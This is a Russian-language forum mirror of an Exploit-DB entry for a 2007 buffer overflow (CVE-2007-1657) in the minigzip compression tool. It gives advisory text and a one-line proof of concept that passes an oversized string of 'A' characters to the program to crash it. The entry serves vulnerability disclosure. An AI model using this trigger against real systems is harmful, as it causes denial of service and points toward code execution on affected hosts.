- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29740
- Проверка EDB
-
- Пройдено
- Автор
- STARCADI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-1657
- Дата публикации
- 2007-03-14
MiniGZip - Controls File_Compress Buffer Overflow
Код:
source: https://www.securityfocus.com/bid/22964/info
The 'minigzip' tool is prone to a buffer-overflow vulnerability because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
A local attacker can exploit this issue to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial of service.
minigzip `perl -e 'print 'A'x1050'- Источник
- www.exploit-db.com
